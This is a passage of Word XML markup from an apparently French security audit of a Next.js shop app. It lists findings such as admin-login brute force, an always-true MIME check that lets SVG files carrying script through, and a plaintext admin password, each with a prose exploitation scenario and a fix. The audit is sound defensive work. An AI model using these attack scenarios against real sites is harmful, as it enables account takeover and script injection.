          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1D5FA8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Absence de limitation de débit sur la soumission d'avis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>src/app/api/reviews/route.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-770</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1D5FA8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1D5FA8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Injection HTML dans l'email via le nom de fichier uploadé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>src/app/api/upload/route.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1D5FA8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>F-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1D5FA8"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Origine dynamique basée sur le Referer dans les URLs Stripe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>src/lib/siteUrl.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-601</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F0FE"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>I-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F0FE"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Informationnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Politique de mot de passe insuffisante (longueur seule)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>src/app/api/auth/register/route.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-521</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F0FE"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>I-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F0FE"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Informationnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Double instanciation du client Stripe dans le webhook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>src/app/api/webhook/route.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F0FE"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>I-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F0FE"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Informationnelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Proxy API sans restriction d'origine dans next.config.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>next.config.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1768"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>CWE-441</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1614"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>4. Détail des vulnérabilités</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="D97508"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>H-01 — Absence de protection anti-brute-force sur le login admin</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>src/app/api/admin/login/route.ts (lignes 22–42)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-307 — Improper Restriction of Excessive Authentication Attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>L'endpoint POST /api/admin/login n'implémente aucun mécanisme de limitation de débit (rate limiting), de verrouillage de compte ou de CAPTCHA. Un attaquant peut soumettre un nombre illimité de tentatives de mot de passe sans aucune pénalité, rendant une attaque par dictionnaire ou par force brute triviale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Un attaquant automatise des requêtes POST vers /api/admin/login avec une liste de mots de passe courants (rockyou.txt, top-10000-passwords.txt). Sans délai côté serveur, plusieurs milliers de tentatives par seconde sont possibles depuis Cloudflare Workers. Si le mot de passe admin est faible, il sera compromis en quelques secondes. L'accès admin donne un accès complet à toutes les commandes et aux données clients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Activer le Rate Limiting Cloudflare (Règles WAF) sur le chemin /api/admin/login : max 5 requêtes par IP par minute. En complément, ajouter un délai côté serveur (ex. 1 seconde) après chaque échec. Envisager une authentification à deux facteurs (TOTP) pour le compte admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Dans Cloudflare Dashboard → Security → WAF → Rate Limiting Rules</w:t>
        <w:br/>
        <w:t># Expression : (http.request.uri.path eq "/api/admin/login")</w:t>
        <w:br/>
        <w:t># Seuil : 5 requêtes / 60 secondes / IP → action : Block (10 min)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Côté code — ajouter dans POST() avant la comparaison :</w:t>
        <w:br/>
        <w:t>const FAIL_DELAY_MS = 1000;</w:t>
        <w:br/>
        <w:t>// ... après échec d'authentification :</w:t>
        <w:br/>
        <w:t>await new Promise(r =&gt; setTimeout(r, FAIL_DELAY_MS));</w:t>
        <w:br/>
        <w:t>return NextResponse.json({ error: '...' }, { status: 401 });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="B48700"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>M-01 — Bug logique : validation MIME toujours vraie dans l'upload</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>src/app/api/upload/route.ts (lignes 39)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-434 — Unrestricted Upload of File with Dangerous Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>La condition de validation MIME contient un bug critique : `ALLOWED.includes("image/svg+xml")` est toujours `true` car "image/svg+xml" est un élément fixe du tableau ALLOWED. Résultat : `mimeOk` est toujours vrai, quelle que soit la valeur de `file.type`. La validation MIME est effectivement désactivée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Un attaquant peut soumettre un fichier avec un MIME type arbitraire (ex. application/javascript, text/html). Seul le contrôle d'extension (extOk) subsiste, mais ce contrôle est basé sur file.name, qui est fourni par le client et peut être falsifié. Un fichier nommé 'exploit.svg' contenant du JavaScript malveillant passe les deux contrôles, SVG pouvant embarquer des balises &lt;script&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corriger la condition en comparant file.type à la liste :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// ❌ Avant (toujours vrai) :</w:t>
        <w:br/>
        <w:t>const mimeOk = ALLOWED.includes(file.type) || ALLOWED.includes("image/svg+xml");</w:t>
        <w:br/>
        <w:br/>
        <w:t>// ✅ Après :</w:t>
        <w:br/>
        <w:t>const mimeOk = ALLOWED.includes(file.type);</w:t>
        <w:br/>
        <w:t>if (!mimeOk &amp;&amp; !extOk) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return NextResponse.json({ error: 'Format non accepté (SVG, DXF, AI, PDF)' }, { status: 415 });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="B48700"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>M-02 — Mot de passe admin stocké en clair et comparé sans hachage</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4419"/>
        <w:gridCol w:w="4419"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Criticité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>src/app/api/admin/login/route.ts (lignes 31–35)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-256 — Unprotected Storage of Credentials + CWE-208 — Observable Timing Discrepancy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4419"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Description : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Le mot de passe admin est stocké en clair dans la variable d'environnement ADMIN_PASSWORD et comparé avec l'opérateur d'égalité stricte JavaScript (body.password !== expected). Double problème : (1) en cas de fuite des variables d'environnement Cloudflare, le mot de passe est immédiatement utilisable ; (2) la comparaison chaîne directe est susceptible aux attaques par timing (même si l'Edge Cloudflare atténue partiellement ce risque via la latence réseau). En revanche, les utilisateurs bénéficient d'un hashage PBKDF2 — incohérence de sécurité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scénario d'exploitation : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Si un attaquant accède aux logs Cloudflare Workers, aux variables d'environnement via une vulnérabilité tiers, ou à un snapshot de configuration, il obtient directement le mot de passe admin en clair. Un accès admin permet de lire toutes les commandes, emails clients et de modifier les statuts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Correctif recommandé : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Stocker un hash PBKDF2 (même algorithme que user-auth.ts) dans ADMIN_PASSWORD_HASH et utiliser verifyPassword() pour la comparaison :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283" w:right="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E405E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// Variable d'env : ADMIN_PASSWORD_HASH (généré une fois avec hashPassword())</w:t>
        <w:br/>
        <w:br/>
        <w:t>import { verifyPassword } from '@/lib/user-auth';</w:t>
        <w:br/>
        <w:br/>
        <w:t>const secret       = process.env.AUTH_SECRET;</w:t>
        <w:br/>
        <w:t>const passwordHash = process.env.ADMIN_PASSWORD_HASH;</w:t>
        <w:br/>
        <w:br/>
        <w:t>if (!secret || !passwordHash || !body.password) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return NextResponse.json({ error: 'Mot de passe incorrect' }, { status: 401 });</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>const valid = await verifyPassword(body.password, passwordHash);</w:t>
        <w:br/>
        <w:t>if (!valid) {</w:t>
